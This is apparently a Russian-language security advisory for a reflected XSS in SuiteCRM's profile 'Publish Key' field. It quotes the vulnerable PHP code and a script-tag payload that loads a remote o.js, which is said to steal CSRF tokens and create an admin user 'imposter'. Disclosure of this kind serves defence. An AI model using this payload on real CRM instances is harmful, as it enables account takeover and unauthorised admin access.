
Уязвимость в SuiteCRM, которую можно использовать для кражи CSRF-токенов и выполнения несанкционированных действий, таких как создание новых административных пользователей без надлежащей аутентификации.
Поле "Ключ публикации" (Publish Key) на странице редактирования профиля SuiteCRM уязвимо для отраженного межсайтового скриптинга (Reflected XSS), что позволяет злоумышленнику внедрить вредоносный JavaScript-код. Эта уязвимость может быть использована для кражи CSRF-токенов и выполнения несанкционированных действий, таких как создание новых административных пользователей без надлежащей аутентификации.
Уязвимость возникает из-за недостаточной проверки ввода и санитизации поля "Ключ публикации" в приложении SuiteCRM. Когда злоумышленник внедряет вредоносный скрипт, он выполняется в контексте сессии аутентифицированного пользователя. Внедренный скрипт (o.js) затем использует захваченный CSRF-токен для подделки запросов, создающих новых административных пользователей, что фактически ставит под угрозу целостность и безопасность экземпляра CRM.
Эта уязвимость является критической проблемой Cross-Site Scripting (XSS). Ее влияние включает:
$publish_key = $this->bean->getPreference('calendar_publish_key');
$this->ss->assign('CALENDAR_PUBLISH_KEY', $publish_key);
$publish_url = $sugar_config['site_url'] . '/vcal_server.php';
$token = "/";
$publish_url .= $token . "type=vfb&source=outlook&key=<span id=\"cal_pub_key_span\">$publish_key</span>";
$ical_url = $sugar_config['site_url'] . "/ical_server.php?type=ics&key=<span id=\"ical_pub_key_span\">$publish_key</span>";
$this->ss->assign("CALENDAR_PUBLISH_URL", $publish_url);
$this->ss->assign("CALENDAR_ICAL_URL", $ical_url);
<script src=//localhost:1235/o.js>
Имя пользователя - imposter
Пароль - ok
https://github.com/user-attachments/assets/cdf96f3d-7f61-4371-818b-e344efdcd197